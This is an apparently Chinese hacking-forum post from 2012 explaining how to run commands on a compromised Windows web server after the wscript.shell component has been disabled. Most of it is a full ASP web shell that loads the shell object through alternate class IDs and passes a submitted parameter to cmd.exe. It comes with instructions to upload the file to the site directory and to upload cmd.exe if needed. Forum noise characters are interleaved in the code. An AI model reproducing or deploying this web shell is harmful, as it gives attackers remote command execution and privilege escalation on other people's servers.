找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2084|回复: 0
打印 上一主题 下一主题

wscript.shell删除解决办法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:36:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。7 ]( _+ X4 Y! s# g
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。# K: i$ D9 `. n9 _- _/ n! Q8 U6 |
要想让运行命令可以试试这种方法,成功率为五五之数。2 x4 H4 P$ }$ ]* [
把下面代码复制:
( {" D; X: N9 a) H' c0 f<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>0 O/ B3 b- J- R( e9 }
<%if err then%>* r: S; f9 b6 w" B. P
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>) j1 A2 d( g7 d4 a7 U$ |8 n2 E
<%
0 Q% t. D; Q* ]4 iend if' P1 F9 G1 N) x' c7 E
response.write("<textarea readonly cols=80 rows=20>")- f0 T# w7 X) u0 u7 C
On Error Resume Next
( T5 i4 i) g. x! Eresponse.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
0 _: u( Y5 u/ dresponse.write("</textarea>")
, z. X% {( h, i( L/ f2 |response.write("<form method='post'>")
7 {* w/ c$ k& b2 hresponse.write("<input type=text name='c' size=60><br>")
9 L( w3 A4 r1 W3 Gresponse.write("<input type=submit value='执行'></form>")' q; W$ N9 `0 m& p9 b$ F
%>5 M, G# F8 s  m  ]) r7 P
5 q8 i( K  M" W' }$ e
保存为一个asp文件,然后传到网站目录上去
3 K8 w7 p$ p$ W4 d* K运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
. p* K2 z1 ~- f, N5 P. A1 {我用此成功运行过cacls命令。
+ e2 b. j% y: f0 }8 P
: W6 G& Y: {3 l第二那就是运行时出错,可能限制某些代码执行
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表